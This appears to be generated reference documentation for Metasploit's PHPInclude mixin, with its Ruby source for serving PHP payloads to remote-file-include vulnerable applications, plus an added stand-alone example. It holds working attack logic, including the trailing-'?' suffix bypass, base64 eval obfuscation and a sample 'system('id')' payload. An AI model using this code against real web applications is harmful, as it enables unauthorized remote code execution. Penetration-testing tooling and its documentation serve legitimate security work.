Module: Msf::Exploit::Remote::HttpServer::PHPInclude

Includes:
Msf::Exploit::Remote::HttpServer
Defined in:
lib/msf/core/exploit/http/server.rb

Overview

This module provides methods for exploiting PHP scripts by acting as an HTTP server that hosts the payload for Remote File Include (RFI) vulnerabilities: the vulnerable script is made to include() a URL pointing at this server, and the PHP returned by the server is executed in the application's context. The including module supplies a php_exploit method that delivers the include URL to the target; this mixin takes care of starting the server, wrapping the payload as PHP and stopping the server again.

Instance Method Summary

Methods included from Msf::Exploit::Remote::HttpServer

#add_resource, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #print_debug, #print_error, #print_line, #print_status, #print_warning, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #resource_uri, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #srvhost_addr, #start_service, #use_zlib, #vprint_debug, #vprint_error, #vprint_line, #vprint_status, #vprint_warning

Methods included from Auxiliary::Report

#db, #get_client, #get_host, #inside_workspace_boundary?, #mytask, #myworkspace, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from TcpServer

#cleanup, #on_client_close, #on_client_connect, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #ssl, #ssl_cert, #ssl_compression, #start_service, #stop_service

Instance Method Details

#autofilterObject

Because PHP remote file include exploits are Stance::Aggressive, this overrides HttpServer's normal non-automatic behaviour so that callers which honour autofilter may run this module automatically.


# File 'lib/msf/core/exploit/http/server.rb', line 931

def autofilter
  true
end

#exploitObject

:category: Exploit::Remote::TcpServer overrides

Overrides exploit() to handle service start/stop. Once the server is listening it calls the including module's php_exploit method, which is expected to trigger the include on the target, keeps the server up for a further five seconds so the target can fetch the payload, and then stops the service (also on Ctrl-C, which is re-raised).

SSL is disabled for the service, since the PHP payload is always served from a plain-HTTP server. There are two reasons for this:

  1. https:// include URLs are only supported on PHP versions after 4.3.0, and only if the OpenSSL extension is compiled in, a non-default configuration on most systems.

  2. Somewhat less importantly, the datastore's SSL option is shared with the client-side connection to the vulnerable server, and the two settings do not necessarily agree. The option is therefore cleared only for the duration of start_service and restored immediately afterwards.


# File 'lib/msf/core/exploit/http/server.rb', line 948

def exploit
  old_ssl = datastore["SSL"]
  datastore["SSL"] = false
  start_service
  datastore["SSL"] = old_ssl

  #if (datastore["SRVHOST"] == "0.0.0.0" and Rex::Socket.is_internal?(srvhost_addr))
  #	print_error("Warning: the URL used for the include might be wrong!")
  #	print_error("If the target system can route to #{srvhost_addr} it")
  #	print_error("is safe to ignore this warning. If not, try using a")
  #	print_error("reverse payload instead of bind.")
  #end

  begin
    print_status("PHP include server started.");
    php_exploit
    ::IO.select(nil, nil, nil, 5)
  rescue ::Interrupt
    raise $!
  ensure
    stop_service
  end
end

#initialize(info = {}) ⇒ Object


# File 'lib/msf/core/exploit/http/server.rb', line 917

def initialize(info = {})

  # Override TCPServer's stance of passive
  super(update_info(info, 'Stance' => Msf::Exploit::Stance::Aggressive))

  register_evasion_options(
    [
      OptEnum.new('PHP::Encode', [false, 'Enable PHP code obfuscation', 'none', ['none', 'base64']]),
    ], Exploit::Remote::HttpServer::PHPInclude
  )
end

#on_request_uri(cli, request, headers = {}) ⇒ Object

:category: Event Handlers

Handle an incoming request for the PHP payload: the payload is regenerated for the connecting client (so a connect-back payload is built against that client's address) and, if generation succeeds, sent wrapped as PHP via #send_php_payload. If the payload cannot be regenerated, nothing is sent.


# File 'lib/msf/core/exploit/http/server.rb', line 992

def on_request_uri(cli, request, headers={})
  # Re-generate the payload
  return if ((p = regenerate_payload(cli)) == nil)

  # Send it to the application
  send_php_payload(cli, p.encoded, headers)
end

#php_include_url(sock = nil) ⇒ String

The PHP include URL (pre-encoded). The host is srvhost_addr, bracketed if it is an IPv6 address, followed by SRVPORT and the module's resource path.

The URL ends in a trailing '?'. Vulnerable applications commonly append something to the attacker-controlled value before including it (a '.php' extension, for example); the '?' turns any such suffix into a query string, so the include still resolves to the resource served by this module.

Does not take SSL into account. For the reasoning behind this, see #exploit. The sock argument is accepted for interface compatibility and is not used.

Returns:

  • (String)

    The URL to be used as the argument in a call to require, require_once, include or include_once in a vulnerable PHP app.


# File 'lib/msf/core/exploit/http/server.rb', line 1009

def php_include_url(sock=nil)
  host = srvhost_addr
  if Rex::Socket.is_ipv6?(host)
    host = "[#{host}]"
  end
  "http://#{host}:#{datastore['SRVPORT']}#{get_resource()}?"
end

#send_php_payload(cli, body, headers = {}) ⇒ Object

Transmits a PHP payload to the web application. The body is wrapped according to the PHP::Encode evasion option: with 'none' it is placed directly inside <?php ... ?> tags; with 'base64' it is base64-encoded and wrapped as <?php eval(base64_decode('...'));?>, so that the payload source does not appear verbatim on the wire. The result is sent with #send_response using the supplied headers.


# File 'lib/msf/core/exploit/http/server.rb', line 975

def send_php_payload(cli, body, headers = {})

  case datastore['PHP::Encode']
  when 'base64'
    body = "<?php eval(base64_decode('#{Rex::Text.encode_base64(body)}'));?>"
  when 'none'
    body = "<?php #{body} ?>"
  end

  send_response(cli, body, headers)
end
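The following is an added, stand-alone Ruby example that is not part of the Metasploit source documented on this page. It models what #php_include_url and #send_php_payload produce, so the behaviour can be inspected without a running framework: IPAddr and Base64 from the standard library stand in for Rex::Socket.is_ipv6? and Rex::Text.encode_base64, and the host, port, resource path and PHP code are constructed sample values. It also shows why the include URL ends in '?', by simulating an application that appends '.php' to the included path before fetching it.

```ruby
require 'base64'
require 'ipaddr'
require 'uri'

# True only for a literal IPv6 address; hostnames and IPv4 literals return
# false, mirroring Rex::Socket.is_ipv6? for the purposes of this example.
def ipv6?(host)
  IPAddr.new(host).ipv6?
rescue ArgumentError
  false
end

# Stand-in for PHPInclude#php_include_url: the host the vulnerable app will
# connect back to (bracketed when IPv6), the server port, the resource path
# and a trailing '?'. Anything the application appends to the included path
# then lands in the query string instead of changing the path.
def php_include_url(srvhost, srvport, resource)
  host = ipv6?(srvhost) ? "[#{srvhost}]" : srvhost
  "http://#{host}:#{srvport}#{resource}?"
end

# Stand-in for the body construction in PHPInclude#send_php_payload: raw PHP
# code wrapped in <?php ... ?> tags, optionally obfuscated the way the
# PHP::Encode 'base64' evasion option does.
def php_payload_body(php_code, encode = 'none')
  case encode
  when 'base64'
    "<?php eval(base64_decode('#{Base64.strict_encode64(php_code)}'));?>"
  when 'none'
    "<?php #{php_code} ?>"
  else
    raise ArgumentError, "unknown PHP::Encode value #{encode.inspect}"
  end
end

# Simulate a vulnerable application doing include($_GET['page'] . '.php'):
# returns the path and query PHP's http:// wrapper would actually request.
def effective_request(include_url, suffix = '.php')
  uri = URI.parse(include_url + suffix)
  [uri.path, uri.query]
end

# Recover the original PHP code from a base64-wrapped body, i.e. what the
# eval() on the target ends up executing.
def unwrap_base64_body(body)
  m = body.match(%r{base64_decode\('([A-Za-z0-9+/=]+)'\)})
  m && Base64.strict_decode64(m[1])
end

if __FILE__ == $0
  # Constructed sample values; a real module takes these from the datastore.
  url = php_include_url('192.0.2.10', 8080, '/aXkq3Fz')
  puts url
  p effective_request(url)          # path unchanged, '.php' is now the query
  puts php_payload_body("system('id');", 'base64')
end
```

Without the trailing '?', the same application would request '/aXkq3Fz.php', a resource this server never registered, and #send_not_found would answer instead of the payload.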